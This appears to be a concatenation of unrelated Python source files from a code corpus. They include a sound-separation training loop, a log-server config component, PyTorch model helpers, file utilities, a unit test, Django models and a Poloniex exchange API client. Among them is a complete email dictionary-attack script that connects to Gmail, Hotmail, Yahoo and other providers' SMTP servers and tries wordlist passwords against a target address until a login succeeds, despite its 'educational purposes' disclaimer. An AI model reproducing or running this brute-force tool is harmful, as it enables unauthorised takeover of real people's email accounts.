batch_data['mags'] frames = batch_data['frames'] N = args.num_mix B = mag_mix.shape[0] for n in range(N): frames[n] = torch.autograd.Variable(frames[n]).to(args.device) mags[n] = torch.autograd.Variable(mags[n]).to(args.device) mag_mix = torch.autograd.Variable(mag_mix).to(args.device) # forward pass # return feat_sound feat_sound, outputs = netWrapper1.forward(mags, mag_mix, args) gt_masks = outputs['gt_masks'] mag_mix_ = outputs['mag_mix'] weight_ = outputs['weight'] # return feat_frame, and emb_frame feat_frame, emb_frame = netWrapper2.forward(frames, args) # random select positive/negative pairs idx_pos = torch.randint(0,N, (1,)) idx_neg = N -1 -idx_pos # appearance attention masks = netWrapper3.forward(feat_frame, emb_frame[idx_pos], args) mask_pos = masks[idx_pos] mask_neg = masks[idx_neg] # max pooling pred_pos = F.adaptive_max_pool2d(mask_pos, 1) pred_pos = pred_pos.view(mask_pos.shape[0]) pred_neg = F.adaptive_max_pool2d(mask_neg, 1) pred_neg = pred_neg.view(mask_neg.shape[0]) # ground truth for the positive/negative pairs y1 = torch.ones(B,device=args.device).detach() y0 = torch.zeros(B, device=args.device).detach() # localization loss loss_loc_pos = crit_loc(pred_pos, y1).reshape(1) loss_loc_neg = crit_loc(pred_neg, y0).reshape(1) loss_loc = args.lamda * (loss_loc_pos + loss_loc_neg)/N # Calculate val accuracy pred_pos = (pred_pos > args.mask_thres) pred_neg = (pred_neg > args.mask_thres) valacc = 0 for j in range(B): if pred_pos[j].item() == y1[j].item(): valacc += 1.0 if pred_neg[j].item() == y0[j].item(): valacc += 1.0 valacc = valacc/N/B # sepatate sounds sound_size = feat_sound.size() B, C = sound_size[0], sound_size[1] pred_masks = [None for n in range(N)] for n in range(N): feat_img = emb_frame[n] feat_img = feat_img.view(B, 1, C) pred_masks[n] = torch.bmm(feat_img, feat_sound.view(B, C, -1)) \ .view(B, 1, *sound_size[2:]) pred_masks[n] = activate(pred_masks[n], args.output_activation) # separatioon loss loss_sep = crit_sep(pred_masks, gt_masks, weight_).reshape(1) # total loss loss = loss_loc + loss_sep loss_meter.update(loss.item()) loss_acc_meter.update(valacc) loss_sep_meter.update(loss_sep.item()) loss_loc_meter.update(loss_loc.item()) print('[Eval] iter {}, loss: {:.4f}, loss_loc: {:.4f}, loss_sep: {:.4f}, acc: {:.4f} '.format(i, loss.item(), loss_loc.item(), loss_sep.item(), valacc)) # calculate metrics sdr_mix, sdr, sir, sar = calc_metrics(batch_data, pred_masks, args) sdr_mix_meter.update(sdr_mix) sdr_meter.update(sdr) sir_meter.update(sir) sar_meter.update(sar) # output visualization if len(vis_rows) < args.num_vis: output_visuals_PosNeg(vis_rows, batch_data, mask_pos, mask_neg, idx_pos, idx_neg, pred_masks, gt_masks, mag_mix_, weight_, args) print('[Eval Summary] Epoch: {}, Loss: {:.4f}, Loss_loc: {:.4f}, Loss_sep: {:.4f}, acc: {:.4f}, sdr_mix: {:.4f}, sdr: {:.4f}, sir: {:.4f}, sar: {:.4f}, ' .format(epoch, loss_meter.average(), loss_loc_meter.average(), loss_sep_meter.average(), loss_acc_meter.average(), sdr_mix_meter.average(), sdr_meter.average(), sir_meter.average(), sar_meter.average())) history['val']['epoch'].append(epoch) history['val']['err'].append(loss_meter.average()) history['val']['err_loc'].append(loss_loc_meter.average()) history['val']['err_sep'].append(loss_sep_meter.average()) history['val']['acc'].append(loss_acc_meter.average()) history['val']['sdr'].append(sdr_meter.average()) history['val']['sir'].append(sir_meter.average()) history['val']['sar'].append(sar_meter.average()) # Plot figure if epoch > 0: print('Plotting figures...') plot_loss_loc_sep_acc_metrics(args.ckpt, history) print('this evaluation round is done!') # train one epoch def train(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader, optimizer, history, epoch, args): print('Training at {} epochs...'.format(epoch)) torch.set_grad_enabled(True) batch_time = AverageMeter() data_time = AverageMeter() # switch to train mode netWrapper1.train() netWrapper2.train() netWrapper3.train() # main loop torch.cuda.synchronize() tic = time.perf_counter() for i, batch_data in enumerate(loader): mag_mix = batch_data['mag_mix'] mags = batch_data['mags'] frames = batch_data['frames'] N = args.num_mix B = mag_mix.shape[0] for n in range(N): frames[n] = torch.autograd.Variable(frames[n]).to(args.device) mags[n] = torch.autograd.Variable(mags[n]).to(args.device) mag_mix = torch.autograd.Variable(mag_mix).to(args.device) # forward pass optimizer.zero_grad() # return feat_sound feat_sound, outputs = netWrapper1.forward(mags, mag_mix, args) gt_masks = outputs['gt_masks'] mag_mix_ = outputs['mag_mix'] weight_ = outputs['weight'] # return feat_frame, and emb_frame feat_frame, emb_frame = netWrapper2.forward(frames, args) # random select positive/negative pairs idx_pos = torch.randint(0,N, (1,)) idx_neg = N -1 -idx_pos # appearance attention masks = netWrapper3.forward(feat_frame, emb_frame[idx_pos], args) mask_pos = masks[idx_pos] mask_neg = masks[idx_neg] # max pooling pred_pos = F.adaptive_max_pool2d(mask_pos, 1) pred_pos = pred_pos.view(mask_pos.shape[0]) pred_neg = F.adaptive_max_pool2d(mask_neg, 1) pred_neg = pred_neg.view(mask_neg.shape[0]) # ground truth for the positive/negative pairs y1 = torch.ones(B,device=args.device).detach() y0 = torch.zeros(B, device=args.device).detach() # localization loss and acc loss_loc_pos = crit_loc(pred_pos, y1).reshape(1) loss_loc_neg = crit_loc(pred_neg, y0).reshape(1) loss_loc = args.lamda * (loss_loc_pos + loss_loc_neg)/N pred_pos = (pred_pos > args.mask_thres) pred_neg = (pred_neg > args.mask_thres) valacc = 0 for j in range(B): if pred_pos[j].item() == y1[j].item(): valacc += 1.0 if pred_neg[j].item() == y0[j].item(): valacc += 1.0 valacc = valacc/N/B # sepatate sounds (for simplicity, we don't use the alpha and beta) sound_size = feat_sound.size() B, C = sound_size[0], sound_size[1] pred_masks = [None for n in range(N)] for n in range(N): feat_img = emb_frame[n] feat_img = feat_img.view(B, 1, C) pred_masks[n] = torch.bmm(feat_img, feat_sound.view(B, C, -1)) \ .view(B, 1, *sound_size[2:]) pred_masks[n] = activate(pred_masks[n], args.output_activation) # separation loss loss_sep = crit_sep(pred_masks, gt_masks, weight_).reshape(1) # total loss loss = loss_loc + loss_sep loss.backward() optimizer.step() # measure total time torch.cuda.synchronize() batch_time.update(time.perf_counter() - tic) tic = time.perf_counter() # display if i % args.disp_iter == 0: print('Epoch: [{}][{}/{}], Time: {:.2f}, Data: {:.2f}, ' 'lr_sound: {}, lr_frame: {}, lr_avol: {}, ' 'loss: {:.5f}, loss_loc: {:.5f}, loss_sep: {:.5f}, acc: {:.5f} ' .format(epoch, i, args.epoch_iters, batch_time.average(), data_time.average(), args.lr_sound, args.lr_frame, args.lr_avol, loss.item(), loss_loc.item(), loss_sep.item(), valacc)) fractional_epoch = epoch - 1 + 1. * i / args.epoch_iters history['train']['epoch'].append(fractional_epoch) history['train']['err'].append(loss.item()) history['train']['err_loc'].append(loss_loc.item()) history['train']['err_sep'].append(loss_sep.item()) history['train']['acc'].append(valacc) def checkpoint(net_sound, net_frame, net_avol, optimizer, history, epoch, args): print('Saving checkpoints at {} epochs.'.format(epoch)) suffix_latest = 'latest.pth' suffix_best = 'best.pth' state = {'epoch': epoch, \ 'state_dict_net_sound': net_sound.state_dict(), \ 'state_dict_net_frame': net_frame.state_dict(),\ 'state_dict_net_avol': net_avol.state_dict(),\ 'optimizer': optimizer.state_dict(), \ 'history': history, } torch.save(state, '{}/checkpoint_{}'.format(args.ckpt, suffix_latest)) cur_err = history['val']['err'][-1] if cur_err <= args.best_err: args.best_err = cur_err torch.save(state, '{}/checkpoint_{}'.format(args.ckpt, suffix_best)) def load_checkpoint(net_sound, net_frame, net_avol, optimizer, history, filename): start_epoch = 0 if os.path.isfile(filename): print("=> loading checkpoint '{}'".format(filename)) checkpoint = torch.load(filename) start_epoch = checkpoint['epoch'] + 1 net_sound.load_state_dict(checkpoint['state_dict_net_sound']) net_frame.load_state_dict(checkpoint['state_dict_net_frame']) net_avol.load_state_dict(checkpoint['state_dict_net_avol']) optimizer.load_state_dict(checkpoint['optimizer']) for state in optimizer.state.values(): for k, v in state.items(): if isinstance(v, torch.Tensor): state[k] = v.cuda() history = checkpoint['history'] print("=> loaded checkpoint '{}' (epoch {})" .format(filename, checkpoint['epoch'])) else: print("=> no checkpoint found at '{}'".format(filename)) return net_sound, net_frame, net_avol, optimizer, start_epoch, history def load_checkpoint_from_train(net_sound, net_frame, net_avol, filename): if os.path.isfile(filename): print("=> loading checkpoint '{}'".format(filename)) checkpoint = torch.load(filename) print('epoch: ', checkpoint['epoch']) net_sound.load_state_dict(checkpoint['state_dict_net_sound']) net_frame.load_state_dict(checkpoint['state_dict_net_frame']) net_avol.load_state_dict(checkpoint['state_dict_net_avol']) else: print("=> no checkpoint found at '{}'".format(filename)) return net_sound, net_frame, net_avol def load_sep(net_sound, net_frame, filename): if os.path.isfile(filename): print("=> loading checkpoint '{}'".format(filename)) checkpoint = torch.load(filename) print('epoch: ', checkpoint['epoch']) net_sound.load_state_dict(checkpoint['state_dict_net_sound']) net_frame.load_state_dict(checkpoint['state_dict_net_frame']) else: print("=> no checkpoint found at '{}'".format(filename)) return net_sound, net_frame def create_optimizer(net_sound, net_frame, net_avol, args): param_groups = [{'params': net_sound.parameters(), 'lr': args.lr_frame}, {'params': net_frame.parameters(), 'lr': args.lr_sound}, {'params': net_avol.parameters(), 'lr': args.lr_avol}] return torch.optim.SGD(param_groups, momentum=args.beta1, weight_decay=args.weight_decay) def adjust_learning_rate(optimizer, args): args.lr_sound *= 0.1 args.lr_frame *= 0.1 args.lr_avol *= 0.1 for param_group in optimizer.param_groups: param_group['lr'] *= 0.1 def main(args): # Network Builders torch.manual_seed(0) torch.cuda.manual_seed(0) np.random.seed(0) random.seed(0) builder = ModelBuilder() net_sound = builder.build_sound( arch=args.arch_sound, input_channel=1, output_channel=args.num_channels, fc_dim=args.num_channels, weights=args.weights_sound) net_frame = builder.build_frame( arch=args.arch_frame, fc_dim=args.num_channels, pool_type=args.img_pool, weights=args.weights_frame) net_avol = builder.build_avol( arch=args.arch_avol, fc_dim=args.num_channels, weights=args.weights_frame) crit_loc = nn.BCELoss() crit_sep = builder.build_criterion(arch=args.loss) # Dataset and Loader dataset_train = MUSICMixDataset( args.list_train, args, split='train') dataset_val = MUSICMixDataset( args.list_val, args, max_sample=args.num_val, split='val') loader_train = torch.utils.data.DataLoader( dataset_train, batch_size=args.batch_size, shuffle=True, num_workers=int(args.workers), drop_last=True) loader_val = torch.utils.data.DataLoader( dataset_val, batch_size=args.batch_size, shuffle=False, num_workers=int(args.workers), drop_last=False) args.epoch_iters = len(dataset_train) // args.batch_size print('1 Epoch = {} iters'.format(args.epoch_iters)) # Set up optimizer optimizer = create_optimizer(net_sound, net_frame, net_avol, args) # History of peroformance history = { 'train': {'epoch': [], 'err': [], 'err_loc': [], 'err_sep': [], 'acc': []}, 'val': {'epoch': [], 'err': [], 'err_loc': [], 'err_sep': [], 'acc': [], 'sdr': [], 'sir': [], 'sar': []}} # Training loop # Load from pretrained models start_epoch = 1 model_name = args.ckpt + '/checkpoint.pth' if os.path.exists(model_name): if args.mode == 'eval': net_sound, net_frame, net_avol = load_checkpoint_from_train(net_sound, net_frame, net_avol, model_name) elif args.mode == 'train': model_name = args.ckpt + '/checkpoint_latest.pth' net_sound, net_frame, net_avol, optimizer, start_epoch, history = load_checkpoint(net_sound, net_frame, net_avol, optimizer, history, model_name) print("Loading from previous checkpoint.") else: if args.mode == 'train' and start_epoch==1 and os.path.exists(args.weights_model): net_sound, net_frame = load_sep(net_sound, net_frame, args.weights_model) print("Loading from appearance + sound checkpoint.") # Wrap networks netWrapper1 = NetWrapper1(net_sound) netWrapper1 = torch.nn.DataParallel(netWrapper1, device_ids=range(args.num_gpus)).cuda() netWrapper1.to(args.device) netWrapper2 = NetWrapper2(net_frame) netWrapper2 = torch.nn.DataParallel(netWrapper2, device_ids=range(args.num_gpus)).cuda() netWrapper2.to(args.device) netWrapper3 = NetWrapper3(net_avol) netWrapper3 = torch.nn.DataParallel(netWrapper3, device_ids=range(args.num_gpus)).cuda() netWrapper3.to(args.device) # Eval mode #evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, 0, args) if args.mode == 'eval': evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, 0, args) print('Evaluation Done!') return for epoch in range(start_epoch, args.num_epoch + 1): train(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_train, optimizer, history, epoch, args) # drop learning rate if epoch in args.lr_steps: adjust_learning_rate(optimizer, args) ## Evaluation and visualization if epoch % args.eval_epoch == 0: evaluate(crit_loc, crit_sep, netWrapper1, netWrapper2, netWrapper3, loader_val, history, epoch, args) # checkpointing checkpoint(net_sound, net_frame, net_avol, optimizer, history, epoch, args) print('Training Done!') if __name__ == '__main__': # arguments parser = ArgParser() args = parser.parse_train_arguments() args.batch_size = args.num_gpus * args.batch_size_per_gpu args.device = torch.device("cuda") # experiment name if args.mode == 'train': args.id += '-{}mix'.format(args.num_mix) if args.log_freq: args.id += '-LogFreq' args.id += '-{}-{}-{}'.format( args.arch_frame, args.arch_sound, args.arch_avol) args.id += '-frames{}stride{}'.format(args.num_frames, args.stride_frames) args.id += '-{}'.format(args.img_pool) if args.binary_mask: assert args.loss == 'bce', 'Binary Mask should go with BCE loss' args.id += '-binary' else: args.id += '-ratio' if args.weighted_loss: args.id += '-weightedLoss' args.id += '-channels{}'.format(args.num_channels) args.id += '-epoch{}'.format(args.num_epoch) args.id += '-step' + '_'.join([str(x) for x in args.lr_steps]) print('Model ID: {}'.format(args.id)) # paths to save/load output args.ckpt = os.path.join(args.ckpt, args.id) if args.mode == 'train': args.weights_model = 'ckpt_res50_DV3P_MUSIC_N2_f1_binary_bs10_TrainS335_D65_ValValS100_ValTestS130_dup100_f8fps_11k/MUSIC-2mix-LogFreq-resnet18dilated_50-deeplabV3Plus_mobilenetv2-frames1stride24-maxpool-binary-weightedLoss-channels11-epoch100-step40_80/checkpoint.pth' args.vis = os.path.join(args.ckpt, 'visualization_train/') makedirs(args.ckpt, remove=False) elif args.mode == 'eval': args.vis = os.path.join(args.ckpt, 'visualization_val/') elif args.mode == 'test': args.vis = os.path.join(args.ckpt, 'visualization_test/') # initialize best error with a big number args.best_err = float("inf") random.seed(args.seed) torch.manual_seed(args.seed) main(args)
StarcoderdataPython
166596
<reponame>softwarefactory-project/sf-conf # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from sfconfig.components import Component class LogServer(Component): def prepare(self, args): super(LogServer, self).prepare(args) args.glue["loguser_authorized_keys"] = [] def configure(self, args, host): self.get_or_generate_ssh_key(args, "zuul_logserver_rsa") args.glue["logservers"].append({ "name": "sflogs", "host": args.glue["logserver_host"], "user": "loguser", "path": "/var/www/logs", }) if args.glue["logserver_host"] != args.glue["install_server_host"]: args.glue.setdefault("zuul_ssh_known_hosts", []).append({ "host_packed": args.glue["logserver_host"], "host": args.glue["logserver_host"], "port": 22 }) args.glue["logs_expiry"] = args.sfconfig["logs"]["expiry"] args.glue["loguser_authorized_keys"].append( args.glue["zuul_logserver_rsa_pub"]) # When logserver is hosted on the gateway, we can use fqdn instead args.glue["logserver_hostname"] = args.glue["logserver_host"] if args.glue["logserver_host"] == args.glue["gateway_host"]: args.glue["logserver_hostname"] = args.sfconfig["fqdn"]
StarcoderdataPython
120751
<reponame>continual-ml/forgetful-networks<filename>model.py<gh_stars>0 import torch import torch.nn as nn def make_processor(in_dim: int, out_dim: int) -> nn.Module: return nn.Sequential( nn.Linear(in_dim, 128), nn.LeakyReLU(0.2), nn.Linear(128, 32), nn.LeakyReLU(0.2), nn.Linear(32, out_dim) ) def freeze(module: nn.Module, state: bool=True) -> None: for param in module.parameters(): param.requires_grad_(not state) class Frozen(nn.Module): def __init__(self, module: nn.Module) -> None: super(Frozen, self).__init__() self._module = module def forward(self, x): freeze(self._module, True) result = self._module(x) freeze(self._module, False) return result class Classifier(nn.Module): def __init__(self, processor: nn.Module, head: nn.Module) -> None: super(Classifier, self).__init__() self._processor = processor self._decision = head def forward(self, img: torch.Tensor) -> torch.Tensor: return self._decision(self._processor(img)) class Ensemble(nn.Module): def __init__(self, processors: list, classifier) -> None: super(Ensemble, self).__init__() self._processors = processors # unregistered parameters self._classifier = classifier def forward(self, img: torch.Tensor) -> tuple: processed = torch.cat([ p(img).unsqueeze(0) for p in self._processors ], dim=0) avg = processed.mean(dim=0) std = processed.std(dim=0).sum(dim=1) y_pred = torch.sigmoid(self._classifier(avg)) return y_pred, std
StarcoderdataPython
3250386
""" Gestion de fichiers """ from log_generator.exit_program import exitProgram from zipfile import ZipFile import os.path import shutil # Verification de la presence du fichier def file_exist_check(file_with_path:str): status:bool = False try: status = os.path.exists(file_with_path) except OSError: print("File handler: Check file exist: " + file_with_path + " fichier non trouve") return status # Verification de la presence du fichier def file_exist_check_ifNot_exit(file_with_path:str): try: status = os.path.exists(file_with_path) if not status: print("File handler: Check file exist: " + file_with_path + " fichier non trouve") exitProgram() except OSError: print("File handler: Check file exist: " + file_with_path + " fichier non trouve") exitProgram() def remove_directory(folder:str): try: os.path.isdir(folder) shutil.rmtree(folder) except OSError: print("File handler: problème avec la suppression du repertoire") exitProgram() def remove_file(file:str): try: os.path.isfile(file) os.remove(file) except OSError: print("File handler: problème avec la suppression du fichier") exitProgram() # Deplacer un repertoire def move_directory(src_path:str, dest_path:str): try: #shutil.move(pathFile + myNewFolderName + '/' + 'IP2LOCATION-LITE-DB11.CSV', myPath + 'IP2LOCATION-LITE-DB11.CSV' ) shutil.move(src_path, dest_path) except: print("File handler: probleme de deplacement de : " + src_path + " vers " + dest_path) exitProgram() # Renommer une archive def rename_directory(current_folder_name:str, new_folder_name:str): try: os.path.isdir(current_folder_name) os.rename(current_folder_name, new_folder_name) except: print("File handler: probleme de renomage de : " + current_folder_name + " en " + new_folder_name) exitProgram() # Exraction d un fichier specifique depuis une archive Zip def extract_a_specified_file_from_zip_archive(archive_path_file_name:str, fileName_to_extract:str, dest_extraction_path:str): with ZipFile(archive_path_file_name, mode="r") as zip_ref: try: zip_ref.extract(fileName_to_extract, dest_extraction_path) zip_ref.close() except: print("File handler: probleme d'extraction de l'archive: " + archive_path_file_name) exitProgram() # Verifier que la taille du fichier n est pas nulle def check_sizeFileNotNull(path_and_file_name:str): if not os.path.isfile(path_and_file_name) and not os.path.getsize(path_and_file_name) > 0: print("File handler: le fichier : " + path_and_file_name + " presente une taille de : " + os.path.getsize(path_and_file_name)) exitProgram() def move_file(src_path_file:str, dest_path_file:str): try: shutil.move(src_path_file, dest_path_file) except: print("File handler: le fichier " + src_path_file + " deplace vers : " + dest_path_file) # Ecrire dans le fichier de persistance des logs enseigné par # l'argument au lancement de la ligne de commande def write_file(fileNamePath: str, content: str): try: file = open(fileNamePath, "a") file.write(content + "\n") except OSError: print("File handler: Impossible decrire dans le fichier " + fileNamePath) exitProgram() # Lire un fichier texte def read_file(filename:str): try: with open(filename, "r") as fileToRead: line = fileToRead.readline() except IOError: print("file_handler: impossible d'ouvrir le fichier pour la lecture: " + filename) exitProgram() return line
StarcoderdataPython
29255
<filename>test/test_document.py # test utilities import unittest from decimal import Decimal # tested module import madseq class Test_Document(unittest.TestCase): def test_parse_line(self): parse = madseq.Document.parse_line Element = madseq.Element self.assertEqual(list(parse(' \t ')), ['']) self.assertEqual(list(parse(' \t ! a comment; ! ')), ['! a comment; ! ']) self.assertEqual(list(parse(' use, z=23.23e2; k: z; !')), ['!', Element(None, 'use', {'z': Decimal('23.23e2')}), Element('k', 'z', {})]) if __name__ == '__main__': unittest.main()
StarcoderdataPython
1777390
# <NAME> # 10/15/2017 # Tested and Developed on Python 2.7 and 3.5 / Configured for Windows, Linux, and Mac # Strictly For Educational/Ethical Pen Testing Purposes ONLY. I condone no illegal activities with this script # Use of this code for unlawful purposes is wrong in every sense of the word, a crime, and strictly discouraged # To help discourage/limit illegal use of this code, advanced functionality of the script has been removed/limited # All sample dictionary files provided in this repo were 100% legally created and include their own license/disclaimer # How to use the code: # python email_dictionary_attack.py # "target_email" - Email you wish to 'hack' # "selected_dictionary" - Dictionary located in the dictionaries directory folder you want to use # "email_service" *Optional - enter only if you have an email we support with a different domain # (i.e. business email running on gmail, parameter default value is 'gmail.com') # "port" *Optional - default is 587* # Usage examples: # python email_dictionary_attack.py "<EMAIL>" "Top196-probable.txt" "gmail.com" "587" # or # python email_dictionary_attack.py "<EMAIL>" "Top196-probable.txt" import smtplib import os import sys # Email Server Dictionary available_server_dict ={'gmail.com': 'smtp.gmail.com', 'hotmail.com': 'smtp.live.com', 'live.com': 'smtp.live.com', 'yahoo.com': 'smtp.mail.yahoo.com', 'ymail.com': 'smtp.mail.yahoo.com', 'yahoo.co.uk': 'smtp.mail.yahoo.com', 'sbcglobal.net': 'smtp.mail.att.net', 'prodigy.net': 'smtp.mail.att.net', 'windstream.net': 'smtp.windstream.net', 'comcast.net': 'smtp.comcast.net'} # OS Specific Parameters os_system = os.name if os_system == 'nt': dict_dir = '\\dictionaries\\' else: dict_dir = '/dictionaries/' # Function to get user name based on inputted email string def get_server_conn_string(email_string, email_service): parsed_email_domain = str(email_string.split('@')[1]) if parsed_email_domain in available_server_dict.keys(): smtp_string = available_server_dict[parsed_email_domain] else: smtp_string = available_server_dict[email_service] return smtp_string # Function to run dictionary attack def run_dict_attack(target_email, selected_dictionary, email_service='gmail.com', port=587): server_conn_string = get_server_conn_string(target_email, email_service) smtpserver = smtplib.SMTP(server_conn_string, port) smtpserver.ehlo() smtpserver.starttls() cwd = os.getcwd() sel_dict = open(cwd + dict_dir + selected_dictionary, "r") for word in sel_dict: try: smtpserver.login(target_email, word) print("[*]--------> Success!\n [*]----------> User's Password Determined: " + word) break except smtplib.SMTPAuthenticationError: print("[!]--------> Incorrect Password: " + word) if __name__ == "__main__": sys_arg_list = sys.argv len_sys_arg = len(sys.argv) print(len_sys_arg) if len_sys_arg == 3: run_dict_attack(sys.argv[1], sys.argv[2]) elif len_sys_arg == 4: run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3]) elif len_sys_arg == 5: run_dict_attack(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4])) else: print("[!]--------> Incorrect number of script parameters entered!") sys.exit(1)
StarcoderdataPython
93440
# coding:utf-8 from django.db import models # isbn13:9787111013853 class Comment(models.Model): """ 评论模型 """ isbn13 = models.CharField(max_length=200,default=None) author = models.CharField(max_length=200,null=True,blank=True,default=None) time = models.CharField(max_length=200,null=True,blank=True,default=None) star = models.IntegerField(default=None) vote = models.CharField(max_length=200,null=True,blank=True,default=None) content = models.TextField(default=None) def __unicode__(self): return self.isbn13 class Reading(models.Model): """ 导读模型 """ isbn13 = models.CharField(max_length=200,default=None) title = models.TextField(default=None) note = models.TextField(default=None) def __unicode__(self): return self.title class Review(models.Model): """ 书评模型 """ isbn13 = models.CharField(max_length=200, default=None) title = models.TextField(default=None) author = models.TextField(default=None) content = models.TextField(default=None) def __unicode__(self): return self.title
StarcoderdataPython
3274905
#!/usr/bin/env python import urllib import urllib2 import hashlib import hmac import time import json import sys import os.path class poloniex(object): _trade_api_url = 'https://poloniex.com/tradingApi' _public_api_url = 'https://poloniex.com/public' _dump_file_prefix = 'dump_polo_' def __init__(self, api_key, api_secret, debug=False): self.debug = debug self.api_key = api_key self.api_secret = api_secret def _trade_api_query(self, command, params={}): result = None try: dump_filename = poloniex._dump_file_prefix + command + '.json' if not self.debug or not os.path.exists(dump_filename): params['command'] = command params['nonce'] = int(time.time() * 1000.0) post_data = urllib.urlencode(params) pd_signed = hmac.new(self.api_secret, post_data, hashlib.sha512).hexdigest() headers = { 'Key' : self.api_key, 'Sign' : pd_signed } req = urllib2.Request(poloniex._trade_api_url, post_data, headers) doc = urllib2.urlopen(req) doc_txt = doc.read() if (self.debug): dump_file = open(dump_filename, 'w') dump_file.write(doc_txt) else: doc = open(dump_filename, 'r') doc_txt = doc.read() result = json.loads(doc_txt) except Exception as e: print e return result def _public_api_query(self, command, params={}): result = None try: dump_filename = poloniex._dump_file_prefix + command + '.json' if not self.debug or not os.path.exists(dump_filename): params['command'] = command param_str = "?%s" % (urllib.urlencode(params)) doc = urllib2.urlopen(poloniex._public_api_url + param_str) doc_txt = doc.read() if (self.debug): dump_file = open(dump_filename, 'w') dump_file.write(doc_txt) else: doc = open(dump_filename, 'r') doc_txt = doc.read() result = json.loads(doc_txt) except Exception as e: print e return result # { # "available": "0.23710790", # "onOrders": "0.00000000", # "btcValue": "0.23710790" # } class balance(object): def __init__(self, balance_data=None): self.balance = 0.0 self.on_order = 0.0 self.btc_value = 0.0 if balance_data: self.balance = float(balance_data[u'available']) self.on_order = float(balance_data[u'onOrders']) self.btc_value = float(balance_data[u'btcValue']) def __repr__(self): return "balance: %.8f, on_order: %.8f, btc_value: %.8f" % (self.balance, self.on_order, self.btc_value) def getBalances(self): balances = None balance_data = self._trade_api_query('returnCompleteBalances') if balance_data != None: balances = {} for coin, data in balance_data.iteritems(): try: balance = poloniex.balance(data) if balance.balance > 0 or balance.on_order > 0: balances[coin] = balance except Exception as e: print e return balances def getFeeInfo(self): print self._trade_api_query('returnFeeInfo') # { # "id": 121, # "last": "6956.95000023", # "lowestAsk": "6959.00000000", # "highestBid": "6956.95000026", # "percentChange": "0.06212977", # "baseVolume": "71544741.92528193", # "quoteVolume": "10434.87960817", # "isFrozen": "0", # "high24hr": "7281.42800003", # "low24hr": "6510.14948952" # } class market(object): def __init__(self, currency_pair, currency_data): self.id = int(currency_data[u'id']) self.currency_pair = currency_pair self.last_price = float(currency_data[u'last']) def __repr__(self): return "id: %d, currency_pair: %s, last_price: %.8f" % (self.id, self.currency_pair, self.last_price) def getTicker(self): ticker = None try: ticker_data = self._public_api_query('returnTicker') if ticker_data: ticker = {} for curr_pair, curr_data in ticker_data.iteritems(): try: mkt, curr = curr_pair.split('_', 2) mkt_data = poloniex.market(curr_pair, curr_data) while True: try: ticker[mkt][curr] = mkt_data break except: ticker[mkt] = {} except Exception as e: print e except Exception as e: print "2", e return ticker class OrderBook(object): def __init__(self): self.bids = [] self.asks = [] def addAsk(self, price, amount): self.asks.append((round(float(price), 8), round(float(amount), 8))) def addBid(self, price, amount): self.bids.append((round(float(price), 8), round(float(amount), 8))) def getAsks(self): return self.asks def getBids(self): return self.bids def getOrderBook(self, currency_pair): order_book = None params = { u'currencyPair' : currency_pair } order_book_data = self._public_api_query('returnOrderBook', params) try: err_str = order_book_data['error'] print err_str except: order_book = poloniex.OrderBook() for ask in order_book_data[u'asks']: order_book.addAsk(ask[0], ask[1]) for bid in order_book_data[u'bids']: order_book.addBid(bid[0], bid[1]) return order_book if __name__ == '__main__': polo_key = '' polo_secret = '' coin_label = "Coin" coin_len = len(coin_label) bal_label = "Balance" bal_len = len(bal_label) order_label = "On Order" order_len = len(order_label) btc_label = "BTC Value" btc_len = len(btc_label) pct_label = "% Index" pct_len = len(pct_label) polo = poloniex(polo_key, polo_secret, debug=(1 == 0)) if False: polo.getFeeInfo() if False: ob = polo.getOrderBook("BTC_ETH") if ob: print "Asks" for price, amount in reversed(ob.getAsks()): print "%11.8f %14.8f" % (price, amount) print "Bids" for price, amount in ob.getBids(): print "%11.8f %14.8f" % (price, amount) print "Spread: %11.8f" % (ob.getAsks()[0][0] - ob.getBids()[0][0]) ob = polo.getOrderBook("ETH_BTC") usdt_price = None usdt_label = "USDT Value" usdt_len = len(usdt_label) try: ticker = polo.getTicker() usdt = ticker[u'USDT'][u'BTC'] usdt_price = usdt.last_price print usdt_price except Exception as e: print e pass if (0 == 1) and ticker: for mkt, currs in ticker.iteritems(): for curr, curr_data in currs.iteritems(): print mkt, curr, curr_data.id, "%.8f" % (curr_data.last_price) if 0 == 0: balances = polo.getBalances() coins = [] btc_total = 0.0 if balances != None: for coin, balance in balances.iteritems(): btc_total += balance.btc_value try: try: btc_xchg = ticker[u'BTC'][coin].last_price except Exception as e: if u'BTC' == coin: btc_xchg = 1.0 else: raise e btc_value = balance.balance * btc_xchg except: print coin, "using balance BTC value" btc_value = balance.btc_value coin_len = max(coin_len, len(coin)) bal_len = max(bal_len, len("%.8f" % (balance.balance))) order_len = max(order_len, len("%.8f" % (balance.on_order))) btc_len = max(btc_len, len("%.8f" % (btc_value))) if usdt_price: usdt_len = max(btc_len, len("%.2f" % (btc_value * usdt_price))) coins.append((coin, balance.balance, balance.on_order, btc_value, 0.0 if not usdt_price else btc_value * usdt_price)) btc_len = max(btc_len, len("%.8f" % (btc_total))) if usdt_price: usdt_len = max(btc_len, len("%.2f" % (btc_total * usdt_price))) if len(balances) > 0: coins.sort(key=lambda coin: -coin[3]) print "%-*s %-*s %-*s %-*s %-*s %-*s" % (coin_len, coin_label, bal_len, bal_label, order_len, order_label, btc_len, btc_label, usdt_len, usdt_label, pct_len, pct_label) for coin in coins: print "%*s %*.8f %*.8f %*.8f %*.2f %*.2f%%" % (coin_len, coin[0], bal_len, coin[1], order_len, coin[2], btc_len, coin[3], usdt_len, coin[4], pct_len - 1, coin[3] / btc_total * 100.0) print "%*s %*s %*s %*.8f %*.2f %*s" % (coin_len, '', bal_len, '', order_len, '', btc_len, btc_total, usdt_len, 0.0 if not usdt_price else btc_total * usdt_price, pct_len - 1, '')
StarcoderdataPython
1674271
